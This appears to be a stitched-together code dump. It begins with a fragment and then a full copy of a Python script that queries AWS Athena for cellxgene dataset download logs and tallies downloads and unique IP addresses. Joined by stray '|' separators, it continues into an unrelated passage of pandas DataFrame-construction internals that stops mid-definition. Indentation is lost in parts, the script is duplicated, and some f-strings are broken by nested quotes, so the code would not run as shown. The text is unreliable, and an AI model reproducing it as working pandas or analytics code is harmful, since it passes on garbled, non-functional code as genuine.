print(f"ERROR: Why is this URI repeated in dataset name dict? {uri}")
else:
dataset_name_by_s3_uri[uri] = dataset_name
if uri in collection_id_by_s3_uri:
print(f"ERROR: Why is this URI repeated in collection id dict? {uri}")
else:
collection_id_by_s3_uri[uri] = collection_id
return dataset_name_by_s3_uri, collection_id_by_s3_uri
def create_query(client, query_id, today_datestring=None):
if today_datestring is None:
today = datetime.date.today().strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (datetime.datetime.now() - datetime.timedelta(days=7)).date().strftime("%Y-%m-%d:%H:%M:%S")
else:
today_datetime = datetime.date.fromisoformat(today_datestring)
today = today_datetime.strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (
(datetime.datetime.fromisoformat(today_datestring) - datetime.timedelta(days=7))
.date()
.strftime("%Y-%m-%d:%H:%M:%S")
)
print(f"Starting date is: {one_week_ago}. Ending date is: {today}.")
query_string = (
"SELECT key, requestdatetime, remoteip, operation, bytessent, useragent FROM "
"cellxgene_portal_dataset_download_logs_db.dataset_download_logs WHERE operation like "
"'REST.GET.OBJECT' AND parse_datetime(requestdatetime,'dd/MMM/yyyy:HH:mm:ss Z') BETWEEN "
f"parse_datetime('{one_week_ago}','yyyy-MM-dd:HH:mm:ss') AND parse_datetime('{today}',"
"'yyyy-MM-dd:HH:mm:ss');"
)
response = client.get_database(
CatalogName="AwsDataCatalog", DatabaseName="cellxgene_portal_dataset_download_logs_db"
)
response = client.start_query_execution(
QueryString=query_string,
ClientRequestToken=query_id,
QueryExecutionContext={"Database": "cellxgene_portal_dataset_download_logs_db", "Catalog": "AwsDataCatalog"},
ResultConfiguration={
"OutputLocation": "s3://corpora-data-prod-logs-queries",
},
)
return response.get("QueryExecutionId")
def get_query_results(client, query_id, dataset_name_by_s3_uri, collection_id_by_s3_uri):
# Wait for the query results
results_have_not_been_calculated = True
while results_have_not_been_calculated:
try:
response = client.get_query_execution(QueryExecutionId=query_id)
status = response.get("QueryExecution").get("Status").get("State")
if status == "SUCCEEDED":
results_have_not_been_calculated = False
except:
print(f"Wasn't able to get query information for query ID {query_id} yet. Please be patient!")
time.sleep(1)
response = client.get_query_results(QueryExecutionId=query_id)
rows = response.get("ResultSet").get("Rows")
# Structure that will hold all the metrics
metadata_by_dataset = defaultdict(dict)
total_downloads = 0
ips = set()
# Delete the first row since it just contains the headers
rows = rows[1:]
for row in rows:
row_data = row.get("Data")
total_downloads += 1
# Get dataset id
dataset_id = row_data[0].get("VarCharValue")
# If this dataset is private, skip its download metrics
if (dataset_id not in collection_id_by_s3_uri) and (dataset_id not in dataset_name_by_s3_uri):
continue
# Generate the unique dataset index for this dataset by concatenating the collection ID and the dataset ID
dataset_index = f"{collection_id_by_s3_uri.get(dataset_id, "PRIVATE_COLLECTION")}/{dataset_name_by_s3_uri.get(dataset_id, "PRIVATE_DATASET")}"
# Get existing aggregated metrics, if any.
if dataset_index not in metadata_by_dataset:
metadata_by_dataset[dataset_index] = {
"curl_downloads": 0,
"browser_downloads": 0,
"total_downloads": 0,
"h5ad_downloads": 0,
"seurat_downloads": 0,
}
dataset_metrics = metadata_by_dataset[dataset_index]
for index, metadata in enumerate(row_data):
if index == 0:
dataset_metrics["total_downloads"] += 1
if "h5ad" in metadata.get("VarCharValue"):
dataset_metrics["h5ad_downloads"] += 1
elif "rds" in metadata.get("VarCharValue"):
dataset_metrics["seurat_downloads"] += 1
if index == 2:
ips.add(metadata.get("VarCharValue"))
if index == 5:
type_of_download = metadata.get("VarCharValue")
if "curl" in type_of_download:
dataset_metrics["curl_downloads"] += 1
else:
dataset_metrics["browser_downloads"] += 1
metadata_by_dataset[dataset_index] = dataset_metrics
dataset_metrics_df = DataFrame.from_dict(metadata_by_dataset, orient="index")
dataset_metrics_df.to_csv("results.csv")
print(f"Total number of downloads of all datasets: {total_downloads}")
print(f"Total number of unique IP addresses: {len(ips)}")
if __name__ == "__main__":
client = boto3.client("athena", region_name="us-west-2")
query_id = str(uuid4())
# Construct dataset id -> collection id and dataset id -> dataset name indices
(
dataset_name_by_s3_uri,
collection_id_by_s3_uri,
) = construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis()
# Create query
query_execution_id = create_query(client, query_id)
# Get query results
get_query_results(client, query_execution_id, dataset_name_by_s3_uri, collection_id_by_s3_uri)
| import boto3
from uuid import uuid4
from collections import defaultdict
import time
from pandas import DataFrame
import datetime
import numpy as np
import pandas
import requests
pandas.set_option(
"display.max_rows", None, "display.max_columns", None, "display.width", 1000, "display.max_colwidth", None
)
def get_json_response(collection_id):
collection_info_response = requests.get(f"https://api.cellxgene.cziscience.com/dp/v1/collections/{collection_id}")
collection_info = collection_info_response.json()
return collection_info
def construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis():
# Fetch list of collection ids
collections_response = requests.get("https://api.cellxgene.cziscience.com/dp/v1/collections")
collections = collections_response.json()["collections"]
collection_ids = [collection.get("id") for collection in collections]
all_collection_responses = {}
for collection_id in collection_ids:
all_collection_responses[collection_id] = get_json_response(collection_id)
dataset_name_by_s3_uri = {}
collection_id_by_s3_uri = {}
for collection_id, collection_information in all_collection_responses.items():
datasets_in_collection = collection_information.get("datasets")
for dataset in datasets_in_collection:
dataset_id = dataset.get("id")
dataset_name = dataset.get("name")
dataset_assets = dataset.get("dataset_assets")
for dataset_asset in dataset_assets:
uri = dataset_asset.get("s3_uri")
uri = uri.replace("s3://corpora-data-prod/", "")
if uri in dataset_name_by_s3_uri:
print(f"ERROR: Why is this URI repeated in dataset name dict? {uri}")
else:
dataset_name_by_s3_uri[uri] = dataset_name
if uri in collection_id_by_s3_uri:
print(f"ERROR: Why is this URI repeated in collection id dict? {uri}")
else:
collection_id_by_s3_uri[uri] = collection_id
return dataset_name_by_s3_uri, collection_id_by_s3_uri
def create_query(client, query_id, today_datestring=None):
if today_datestring is None:
today = datetime.date.today().strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (datetime.datetime.now() - datetime.timedelta(days=7)).date().strftime("%Y-%m-%d:%H:%M:%S")
else:
today_datetime = datetime.date.fromisoformat(today_datestring)
today = today_datetime.strftime("%Y-%m-%d:%H:%M:%S")
one_week_ago = (
(datetime.datetime.fromisoformat(today_datestring) - datetime.timedelta(days=7))
.date()
.strftime("%Y-%m-%d:%H:%M:%S")
)
print(f"Starting date is: {one_week_ago}. Ending date is: {today}.")
query_string = (
"SELECT key, requestdatetime, remoteip, operation, bytessent, useragent FROM "
"cellxgene_portal_dataset_download_logs_db.dataset_download_logs WHERE operation like "
"'REST.GET.OBJECT' AND parse_datetime(requestdatetime,'dd/MMM/yyyy:HH:mm:ss Z') BETWEEN "
f"parse_datetime('{one_week_ago}','yyyy-MM-dd:HH:mm:ss') AND parse_datetime('{today}',"
"'yyyy-MM-dd:HH:mm:ss');"
)
response = client.get_database(
CatalogName="AwsDataCatalog", DatabaseName="cellxgene_portal_dataset_download_logs_db"
)
response = client.start_query_execution(
QueryString=query_string,
ClientRequestToken=query_id,
QueryExecutionContext={"Database": "cellxgene_portal_dataset_download_logs_db", "Catalog": "AwsDataCatalog"},
ResultConfiguration={
"OutputLocation": "s3://corpora-data-prod-logs-queries",
},
)
return response.get("QueryExecutionId")
def get_query_results(client, query_id, dataset_name_by_s3_uri, collection_id_by_s3_uri):
# Wait for the query results
results_have_not_been_calculated = True
while results_have_not_been_calculated:
try:
response = client.get_query_execution(QueryExecutionId=query_id)
status = response.get("QueryExecution").get("Status").get("State")
if status == "SUCCEEDED":
results_have_not_been_calculated = False
except:
print(f"Wasn't able to get query information for query ID {query_id} yet. Please be patient!")
time.sleep(1)
response = client.get_query_results(QueryExecutionId=query_id)
rows = response.get("ResultSet").get("Rows")
# Structure that will hold all the metrics
metadata_by_dataset = defaultdict(dict)
total_downloads = 0
ips = set()
# Delete the first row since it just contains the headers
rows = rows[1:]
for row in rows:
row_data = row.get("Data")
total_downloads += 1
# Get dataset id
dataset_id = row_data[0].get("VarCharValue")
# If this dataset is private, skip its download metrics
if (dataset_id not in collection_id_by_s3_uri) and (dataset_id not in dataset_name_by_s3_uri):
continue
# Generate the unique dataset index for this dataset by concatenating the collection ID and the dataset ID
dataset_index = f"{collection_id_by_s3_uri.get(dataset_id, 'PRIVATE_COLLECTION')}/{dataset_name_by_s3_uri.get(dataset_id, 'PRIVATE_DATASET')}"
# Get existing aggregated metrics, if any.
if dataset_index not in metadata_by_dataset:
metadata_by_dataset[dataset_index] = {
"curl_downloads": 0,
"browser_downloads": 0,
"total_downloads": 0,
"h5ad_downloads": 0,
"seurat_downloads": 0,
}
dataset_metrics = metadata_by_dataset[dataset_index]
for index, metadata in enumerate(row_data):
if index == 0:
dataset_metrics["total_downloads"] += 1
if "h5ad" in metadata.get("VarCharValue"):
dataset_metrics["h5ad_downloads"] += 1
elif "rds" in metadata.get("VarCharValue"):
dataset_metrics["seurat_downloads"] += 1
if index == 2:
ips.add(metadata.get("VarCharValue"))
if index == 5:
type_of_download = metadata.get("VarCharValue")
if "curl" in type_of_download:
dataset_metrics["curl_downloads"] += 1
else:
dataset_metrics["browser_downloads"] += 1
metadata_by_dataset[dataset_index] = dataset_metrics
dataset_metrics_df = DataFrame.from_dict(metadata_by_dataset, orient="index")
dataset_metrics_df.to_csv("results.csv")
print(f"Total number of downloads of all datasets: {total_downloads}")
print(f"Total number of unique IP addresses: {len(ips)}")
if __name__ == "__main__":
client = boto3.client("athena", region_name="us-west-2")
query_id = str(uuid4())
# Construct dataset id -> collection id and dataset id -> dataset name indices
(
dataset_name_by_s3_uri,
collection_id_by_s3_uri,
) = construct_map_of_dataset_assets_to_collection_and_dataset_information_from_apis()
# Create query
query_execution_id = create_query(client, query_id)
# Get query results
get_query_results(client, query_execution_id, dataset_name_by_s3_uri, collection_id_by_s3_uri)
|
"""
Functions for preparing various inputs passed to the DataFrame or Series
constructors before passing them to a BlockManager.
"""
from __future__ import annotations
from collections import abc
from typing import (
TYPE_CHECKING,
Any,
Hashable,
Sequence,
cast,
)
import warnings
import numpy as np
import numpy.ma as ma
from pandas._libs import lib
from pandas._typing import (
ArrayLike,
DtypeObj,
Manager,
)
from pandas.util._exceptions import find_stack_level
from pandas.core.dtypes.cast import (
construct_1d_arraylike_from_scalar,
dict_compat,
maybe_cast_to_datetime,
maybe_convert_platform,
maybe_infer_to_datetimelike,
maybe_upcast,
)
from pandas.core.dtypes.common import (
is_1d_only_ea_dtype,
is_datetime_or_timedelta_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_integer_dtype,
is_list_like,
is_named_tuple,
is_object_dtype,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCSeries,
)
from pandas.core import (
algorithms,
common as com,
)
from pandas.core.arrays import (
Categorical,
DatetimeArray,
ExtensionArray,
TimedeltaArray,
)
from pandas.core.construction import (
ensure_wrapped_if_datetimelike,
extract_array,
range_to_ndarray,
sanitize_array,
)
from pandas.core.indexes.api import (
DatetimeIndex,
Index,
TimedeltaIndex,
default_index,
ensure_index,
get_objs_combined_axis,
union_indexes,
)
from pandas.core.internals.array_manager import (
ArrayManager,
SingleArrayManager,
)
from pandas.core.internals.blocks import (
BlockPlacement,
ensure_block_shape,
new_block_2d,
)
from pandas.core.internals.managers import (
BlockManager,
SingleBlockManager,
create_block_manager_from_blocks,
create_block_manager_from_column_arrays,
)
if TYPE_CHECKING:
from numpy.ma.mrecords import MaskedRecords
# ---------------------------------------------------------------------
# BlockManager Interface
def arrays_to_mgr(
arrays,
columns: Index,
index,
*,
dtype: DtypeObj | None = None,
verify_integrity: bool = True,
typ: str | None = None,
consolidate: bool = True,
) -> Manager:
"""
Segregate Series based on type and coerce into matrices.
Needs to handle a lot of exceptional cases.
"""
if verify_integrity:
# figure out the index, if necessary
if index is None:
index = _extract_index(arrays)
else:
index = ensure_index(index)
# don't force copy because getting jammed in an ndarray anyway
arrays = _homogenize(arrays, index, dtype)
# _homogenize ensures
# - all(len(x) == len(index) for x in arrays)
# - all(x.ndim == 1 for x in arrays)
# - all(isinstance(x, (np.ndarray, ExtensionArray)) for x in arrays)
# - all(type(x) is not PandasArray for x in arrays)
else:
index = ensure_index(index)
arrays = [extract_array(x, extract_numpy=True) for x in arrays]
# Reached via DataFrame._from_arrays; we do validation here
for arr in arrays:
if (
not isinstance(arr, (np.ndarray, ExtensionArray))
or arr.ndim != 1
or len(arr) != len(index)
):
raise ValueError(
"Arrays must be 1-dimensional np.ndarray or ExtensionArray "
"with length matching len(index)"
)
columns = ensure_index(columns)
if len(columns) != len(arrays):
raise ValueError("len(arrays) must match len(columns)")
# from BlockManager perspective
axes = [columns, index]
if typ == "block":
return create_block_manager_from_column_arrays(
arrays, axes, consolidate=consolidate
)
elif typ == "array":
return ArrayManager(arrays, [index, columns])
else:
raise ValueError(f"'typ' needs to be one of {{"block", "array"}}, got '{typ}'")
def rec_array_to_mgr(
data: MaskedRecords | np.recarray | np.ndarray,
index,
columns,
dtype: DtypeObj | None,
copy: bool,
typ: str,
):
"""
Extract from a masked rec array and create the manager.
"""
# essentially process a record array then fill it
fdata = ma.getdata(data)
if index is None:
index = default_index(len(fdata))
else:
index = ensure_index(index)
if columns is not None:
columns = ensure_index(columns)
arrays, arr_columns = to_arrays(fdata, columns)
# fill if needed
if isinstance(data, np.ma.MaskedArray):
# GH#42200 we only get here with MaskedRecords, but check for the
# parent class MaskedArray to avoid the need to import MaskedRecords
data = cast("MaskedRecords", data)
new_arrays = fill_masked_arrays(data, arr_columns)
else:
# error: Incompatible types in assignment (expression has type
# "List[ExtensionArray]", variable has type "List[ndarray]")
new_arrays = arrays # type: ignore[assignment]
# create the manager
# error: Argument 1 to "reorder_arrays" has incompatible type "List[ndarray]";
# expected "List[Union[ExtensionArray, ndarray]]"
arrays, arr_columns = reorder_arrays(
new_arrays, arr_columns, columns, len(index) # type: ignore[arg-type]
)
if columns is None:
columns = arr_columns
mgr = arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ)
if copy:
mgr = mgr.copy()
return mgr
def fill_masked_arrays(data: MaskedRecords, arr_columns: Index) -> list[np.ndarray]:
"""
Convert numpy MaskedRecords to ensure mask is softened.
"""
new_arrays = []
for col in arr_columns:
arr = data[col]
fv = arr.fill_value
mask = ma.getmaskarray(arr)
if mask.any():
arr, fv = maybe_upcast(arr, fill_value=fv, copy=True)
arr[mask] = fv
new_arrays.append(arr)
return new_arrays
def mgr_to_mgr(mgr, typ: str, copy: bool = True):
"""
Convert to specific type of Manager. Does not copy if the type is already
correct. Does not guarantee a copy otherwise. `copy` keyword only controls
whether conversion from Block->ArrayManager copies the 1D arrays.
"""
new_mgr: Manager
if typ == "block":
if isinstance(mgr, BlockManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
new_mgr = arrays_to_mgr(
mgr.arrays, mgr.axes[0], mgr.axes[1], typ="block"
)
else:
new_mgr = SingleBlockManager.from_array(mgr.arrays[0], mgr.index)
elif typ == "array":
if isinstance(mgr, ArrayManager):
new_mgr = mgr
else:
if mgr.ndim == 2:
arrays = [mgr.iget_values(i) for i in range(len(mgr.axes[0]))]
if copy:
arrays = [arr.copy() for arr in arrays]
new_mgr = ArrayManager(arrays, [mgr.axes[1], mgr.axes[0]])
else:
array = mgr.internal_values()
if copy:
array = array.copy()
new_mgr = SingleArrayManager([array], [mgr.index])
else:
raise ValueError(f"'typ' needs to be one of {{"block", "array"}}, got '{typ}'")
return new_mgr
# ---------------------------------------------------------------------
# DataFrame Constructor Interface
def ndarray_to_mgr(
    values, index, columns, dtype: DtypeObj | None, copy: bool, typ: str
) -> Manager:
    """
    Build a Manager (Block- or Array-based, per ``typ``) from 2D-coercible input.

    Parameters
    ----------
    values : ndarray, list, Series, Index or ExtensionArray
    index, columns : Index or None
        Axes; derived from the data when not provided.
    dtype : np.dtype or ExtensionDtype, optional
        Target dtype to coerce to.
    copy : bool
        Whether to copy the input data.
    typ : {"block", "array"}
        Which manager implementation to construct.

    Returns
    -------
    Manager
    """
    # used in DataFrame.__init__
    # input must be a ndarray, list, Series, Index, ExtensionArray
    if isinstance(values, ABCSeries):
        if columns is None:
            if values.name is not None:
                columns = Index([values.name])
        if index is None:
            index = values.index
        else:
            values = values.reindex(index)

        # zero len case (GH #2234)
        if not len(values) and columns is not None and len(columns):
            values = np.empty((0, 1), dtype=object)

    # if the array preparation does a copy -> avoid this for ArrayManager,
    # since the copy is done on conversion to 1D arrays
    copy_on_sanitize = False if typ == "array" else copy

    vdtype = getattr(values, "dtype", None)
    if is_1d_only_ea_dtype(vdtype) or is_1d_only_ea_dtype(dtype):
        # GH#19157
        if isinstance(values, (np.ndarray, ExtensionArray)) and values.ndim > 1:
            # GH#12513 a EA dtype passed with a 2D array, split into
            # multiple EAs that view the values
            # error: No overload variant of "__getitem__" of "ExtensionArray"
            # matches argument type "Tuple[slice, int]"
            values = [
                values[:, n]  # type: ignore[call-overload]
                for n in range(values.shape[1])
            ]
        else:
            values = [values]

        if columns is None:
            columns = Index(range(len(values)))
        else:
            columns = ensure_index(columns)

        return arrays_to_mgr(values, columns, index, dtype=dtype, typ=typ)

    elif is_extension_array_dtype(vdtype) and not is_1d_only_ea_dtype(vdtype):
        # i.e. Datetime64TZ, PeriodDtype; these EAs can be stored 2D directly
        values = extract_array(values, extract_numpy=True)
        if copy:
            values = values.copy()
        if values.ndim == 1:
            values = values.reshape(-1, 1)

    else:
        # by definition an array here
        # the dtypes will be coerced to a single dtype
        values = _prep_ndarray(values, copy=copy_on_sanitize)

        if dtype is not None and not is_dtype_equal(values.dtype, dtype):
            # cast the flattened data, then restore the 2D shape
            shape = values.shape
            flat = values.ravel()

            # GH#40110 see similar check inside sanitize_array
            rcf = not (is_integer_dtype(dtype) and values.dtype.kind == "f")

            values = sanitize_array(
                flat, None, dtype=dtype, copy=copy_on_sanitize, raise_cast_failure=rcf
            )

            values = values.reshape(shape)

    # _prep_ndarray ensures that values.ndim == 2 at this point
    index, columns = _get_axes(
        values.shape[0], values.shape[1], index=index, columns=columns
    )

    _check_values_indices_shape_match(values, index, columns)

    if typ == "array":

        if issubclass(values.dtype.type, str):
            # fixed-width string dtypes are stored as object columns
            values = np.array(values, dtype=object)

        if dtype is None and is_object_dtype(values.dtype):
            arrays = [
                ensure_wrapped_if_datetimelike(
                    maybe_infer_to_datetimelike(values[:, i])
                )
                for i in range(values.shape[1])
            ]
        else:
            if is_datetime_or_timedelta_dtype(values.dtype):
                values = ensure_wrapped_if_datetimelike(values)
            arrays = [values[:, i] for i in range(values.shape[1])]

        if copy:
            arrays = [arr.copy() for arr in arrays]

        return ArrayManager(arrays, [index, columns], verify_integrity=False)

    # BlockManager stores data transposed (columns-as-rows)
    values = values.T

    # if we don't have a dtype specified, then try to convert objects
    # on the entire block; this is to convert if we have datetimelike's
    # embedded in an object type
    if dtype is None and is_object_dtype(values.dtype):

        obj_columns = list(values)
        maybe_datetime = [maybe_infer_to_datetimelike(x) for x in obj_columns]
        # don't convert (and copy) the objects if no type inference occurs
        if any(x is not y for x, y in zip(obj_columns, maybe_datetime)):
            dvals_list = [ensure_block_shape(dval, 2) for dval in maybe_datetime]
            block_values = [
                new_block_2d(dvals_list[n], placement=BlockPlacement(n))
                for n in range(len(dvals_list))
            ]
        else:
            bp = BlockPlacement(slice(len(columns)))
            nb = new_block_2d(values, placement=bp)
            block_values = [nb]
    else:
        bp = BlockPlacement(slice(len(columns)))
        nb = new_block_2d(values, placement=bp)
        block_values = [nb]

    if len(columns) == 0:
        block_values = []

    return create_block_manager_from_blocks(
        block_values, [columns, index], verify_integrity=False
    )
def _check_values_indices_shape_match(
values: np.ndarray, index: Index, columns: Index
) -> None:
"""
Check that the shape implied by our axes matches the actual shape of the
data.
"""
if values.shape[1] != len(columns) or values.shape[0] != len(index):
# Could let this raise in Block constructor, but we get a more
# helpful exception message this way.
if values.shape[0] == 0:
raise ValueError("Empty data passed with indices specified.")
passed = values.shape
implied = (len(index), len(columns))
raise ValueError(f"Shape of passed values is {passed}, indices imply {implied}")
def dict_to_mgr(
    data: dict,
    index,
    columns,
    *,
    dtype: DtypeObj | None = None,
    typ: str = "block",
    copy: bool = True,
) -> Manager:
    """
    Segregate Series based on type and coerce into matrices.
    Needs to handle a lot of exceptional cases.
    Used in DataFrame.__init__

    Parameters
    ----------
    data : dict
        Mapping of column label -> column values (scalars, arrays or Series).
    index, columns : Index or None
        Requested axes; derived from the data when not provided.
    dtype : np.dtype or ExtensionDtype, optional
    typ : {"block", "array"}, default "block"
    copy : bool, default True
        Whether to copy the input arrays.

    Returns
    -------
    Manager
    """
    arrays: Sequence[Any] | Series

    if columns is not None:
        from pandas.core.series import Series

        # Reindexing the dict against ``columns`` marks requested columns
        # that are missing from ``data`` as NaN placeholders.
        arrays = Series(data, index=columns, dtype=object)
        missing = arrays.isna()
        if index is None:
            # GH10856
            # raise ValueError if only scalars in dict
            index = _extract_index(arrays[~missing])
        else:
            index = ensure_index(index)

        # no obvious "empty" int column
        if missing.any() and not is_integer_dtype(dtype):
            nan_dtype: DtypeObj

            if dtype is not None:
                # calling sanitize_array ensures we don't mix-and-match
                # NA dtypes
                midxs = missing.values.nonzero()[0]
                for i in midxs:
                    arr = sanitize_array(arrays.iat[i], index, dtype=dtype)
                    arrays.iat[i] = arr
            else:
                # GH#1783
                nan_dtype = np.dtype("object")
                val = construct_1d_arraylike_from_scalar(np.nan, len(index), nan_dtype)
                nmissing = missing.sum()
                if copy:
                    rhs = [val] * nmissing
                else:
                    # GH#45369: when not copying, each missing column must be
                    # a distinct array so later mutation doesn't alias
                    rhs = [val.copy() for _ in range(nmissing)]
                arrays.loc[missing] = rhs

        arrays = list(arrays)
        columns = ensure_index(columns)

    else:
        keys = list(data.keys())
        columns = Index(keys)
        arrays = [com.maybe_iterable_to_list(data[k]) for k in keys]
        # drop the Index wrapper, keeping the underlying array
        arrays = [arr if not isinstance(arr, Index) else arr._data for arr in arrays]

    if copy:
        if typ == "block":
            # We only need to copy arrays that will not get consolidated, i.e.
            # only EA arrays
            arrays = [x.copy() if isinstance(x, ExtensionArray) else x for x in arrays]
        else:
            # dtype check to exclude e.g. range objects, scalars
            arrays = [x.copy() if hasattr(x, "dtype") else x for x in arrays]

    return arrays_to_mgr(arrays, columns, index, dtype=dtype, typ=typ, consolidate=copy)
def nested_data_to_arrays(
    data: Sequence,
    columns: Index | None,
    index: Index | None,
    dtype: DtypeObj | None,
) -> tuple[list[ArrayLike], Index, Index]:
    """
    Convert a sequence of row-like records into per-column arrays.

    Returns (arrays, columns, index); the caller has already verified
    treat_as_nested(data).
    """
    first = data[0]

    if columns is None and is_named_tuple(first):
        # namedtuple fields double as the column labels
        columns = ensure_index(first._fields)

    arrays, columns = to_arrays(data, columns, dtype=dtype)
    columns = ensure_index(columns)

    if index is None:
        if isinstance(first, ABCSeries):
            index = _get_names_from_index(data)
        elif isinstance(first, Categorical):
            # GH#38845 hit in test_constructor_categorical
            index = default_index(len(first))
        else:
            index = default_index(len(data))

    return arrays, columns, index
def treat_as_nested(data) -> bool:
    """
    Decide whether ``data`` should go through nested_data_to_arrays:
    a non-empty sequence whose first element is itself 1-dimensional
    list-like, excluding 2D ExtensionArrays.
    """
    if len(data) == 0:
        return False
    first = data[0]
    if not is_list_like(first) or getattr(first, "ndim", 1) != 1:
        return False
    return not (isinstance(data, ExtensionArray) and data.ndim == 2)
# ---------------------------------------------------------------------
def _prep_ndarray(values, copy: bool = True) -> np.ndarray:
    """
    Coerce arbitrary array-like input to a 2D np.ndarray.

    1D input gains a trailing length-1 column axis; anything that does not
    end up 2-dimensional raises ValueError.
    """
    if isinstance(values, TimedeltaArray) or (
        isinstance(values, DatetimeArray) and values.tz is None
    ):
        # On older numpy, np.asarray below apparently does not call __array__,
        # so nanoseconds get dropped.
        values = values._ndarray

    if not isinstance(values, (np.ndarray, ABCSeries, Index)):
        if len(values) == 0:
            return np.empty((0, 0), dtype=object)
        elif isinstance(values, range):
            arr = range_to_ndarray(values)
            # add the column axis to make the result 2D
            return arr[..., np.newaxis]

        def convert(v):
            # soft-convert one row/element, preserving platform dtype
            if not is_list_like(v) or isinstance(v, ABCDataFrame):
                return v

            v = extract_array(v, extract_numpy=True)
            res = maybe_convert_platform(v)
            return res

        # we could have a 1-dim or 2-dim list here
        # this is equiv of np.asarray, but does object conversion
        # and platform dtype preservation
        if is_list_like(values[0]):
            values = np.array([convert(v) for v in values])
        elif isinstance(values[0], np.ndarray) and values[0].ndim == 0:
            # GH#21861 see test_constructor_list_of_lists
            values = np.array([convert(v) for v in values])
        else:
            values = convert(values)
    else:
        # drop subclass info
        values = np.array(values, copy=copy)

    if values.ndim == 1:
        values = values.reshape((values.shape[0], 1))
    elif values.ndim != 2:
        raise ValueError(f"Must pass 2-d input. shape={values.shape}")

    return values
def _homogenize(data, index: Index, dtype: DtypeObj | None) -> list[ArrayLike]:
    """
    Align/convert each column in ``data`` to a 1D array over ``index``.

    Series are reindexed (aligned) to ``index``; dicts are looked up against
    an object-cast copy of the index; everything else is passed through
    sanitize_array, so the result is a list of equal-length 1D columns.
    """
    # lazily-built object-dtype view of ``index``, shared across dict lookups
    oindex = None
    homogenized = []

    for val in data:
        if isinstance(val, ABCSeries):
            if dtype is not None:
                val = val.astype(dtype, copy=False)
            if val.index is not index:
                # Forces alignment. No need to copy data since we
                # are putting it into an ndarray later
                val = val.reindex(index, copy=False)

            val = val._values
        else:
            if isinstance(val, dict):
                # GH#41785 this _should_ be equivalent to (but faster than)
                # val = create_series_with_explicit_dtype(val, index=index)._values
                if oindex is None:
                    oindex = index.astype("O")

                if isinstance(index, (DatetimeIndex, TimedeltaIndex)):
                    # see test_constructor_dict_datetime64_index
                    val = dict_compat(val)
                else:
                    # see test_constructor_subclass_dict
                    val = dict(val)
                val = lib.fast_multiget(val, oindex._values, default=np.nan)

            val = sanitize_array(
                val, index, dtype=dtype, copy=False, raise_cast_failure=False
            )
            com.require_length_match(val, index)

        homogenized.append(val)

    return homogenized
def _extract_index(data) -> Index:
    """
    Try to infer an Index from the passed data, raise ValueError on failure.

    Series contribute their index (union'ed); dicts contribute their keys;
    other 1D list-likes only contribute a length, which must be consistent
    across arrays and must match any Series-derived index.
    """
    index = None
    if len(data) == 0:
        index = Index([])
    else:
        raw_lengths = []
        indexes: list[list[Hashable] | Index] = []

        have_raw_arrays = False
        have_series = False
        have_dicts = False

        for val in data:
            if isinstance(val, ABCSeries):
                have_series = True
                indexes.append(val.index)
            elif isinstance(val, dict):
                have_dicts = True
                indexes.append(list(val.keys()))
            elif is_list_like(val) and getattr(val, "ndim", 1) == 1:
                have_raw_arrays = True
                raw_lengths.append(len(val))
            elif isinstance(val, np.ndarray) and val.ndim > 1:
                raise ValueError("Per-column arrays must each be 1-dimensional")

        if not indexes and not raw_lengths:
            raise ValueError("If using all scalar values, you must pass an index")

        elif have_series:
            index = union_indexes(indexes)
        elif have_dicts:
            # dict key order is not meaningful across records, so don't sort
            index = union_indexes(indexes, sort=False)

        if have_raw_arrays:
            lengths = list(set(raw_lengths))
            if len(lengths) > 1:
                raise ValueError("All arrays must be of the same length")

            if have_dicts:
                raise ValueError(
                    "Mixing dicts with non-Series may lead to ambiguous ordering."
                )

            if have_series:
                assert index is not None  # for mypy
                if lengths[0] != len(index):
                    msg = (
                        f"array length {lengths[0]} does not match index "
                        f"length {len(index)}"
                    )
                    raise ValueError(msg)
            else:
                index = default_index(lengths[0])

    # error: Argument 1 to "ensure_index" has incompatible type "Optional[Index]";
    # expected "Union[Union[Union[ExtensionArray, ndarray], Index, Series],
    # Sequence[Any]]"
    return ensure_index(index)  # type: ignore[arg-type]
def reorder_arrays(
    arrays: list[ArrayLike], arr_columns: Index, columns: Index | None, length: int
) -> tuple[list[ArrayLike], Index]:
    """
    Cheaply reindex ``arrays`` (keyed by ``arr_columns``) to the requested
    ``columns`` order; requested columns that are absent become all-NaN
    object arrays of the given ``length``.
    """
    if columns is None or columns.equals(arr_columns):
        # nothing to reorder
        return arrays, arr_columns

    indexer = arr_columns.get_indexer(columns)
    reordered: list[ArrayLike | None] = []
    for pos in indexer:
        if pos == -1:
            # by convention a missing column is all-NaN with object dtype
            missing = np.empty(length, dtype=object)
            missing.fill(np.nan)
            reordered.append(missing)
        else:
            reordered.append(arrays[pos])

    # Incompatible types for mypy, same as the original implementation
    return reordered, columns  # type: ignore[return-value]
def _get_names_from_index(data) -> Index:
    """
    Build an index from the ``name`` attribute of each entry, labelling
    anonymous entries "Unnamed {count}". Falls back to a default RangeIndex
    when nothing at all is named.
    """
    if all(getattr(s, "name", None) is None for s in data):
        return default_index(len(data))

    labels: list[Hashable] = list(range(len(data)))
    unnamed_count = 0
    for pos, s in enumerate(data):
        name = getattr(s, "name", None)
        if name is None:
            labels[pos] = f"Unnamed {unnamed_count}"
            unnamed_count += 1
        else:
            labels[pos] = name

    return Index(labels)
def _get_axes(
    N: int, K: int, index: Index | None, columns: Index | None
) -> tuple[Index, Index]:
    """
    Build the (index, columns) pair for an N x K frame, defaulting each
    missing axis to a RangeIndex of the appropriate length.
    """
    idx = default_index(N) if index is None else ensure_index(index)
    cols = default_index(K) if columns is None else ensure_index(columns)
    return idx, cols
def dataclasses_to_dicts(data):
    """
    Convert a list of dataclass instances into a list of dictionaries.

    Parameters
    ----------
    data : List[Type[dataclass]]

    Returns
    --------
    list_dict : List[dict]

    Examples
    --------
    >>> from dataclasses import dataclass
    >>> @dataclass
    ... class Point:
    ...     x: int
    ...     y: int
    >>> dataclasses_to_dicts([Point(1, 2), Point(2, 3)])
    [{'x': 1, 'y': 2}, {'x': 2, 'y': 3}]
    """
    from dataclasses import asdict

    return [asdict(item) for item in data]
# ---------------------------------------------------------------------
# Conversion of Inputs to Arrays
def to_arrays(
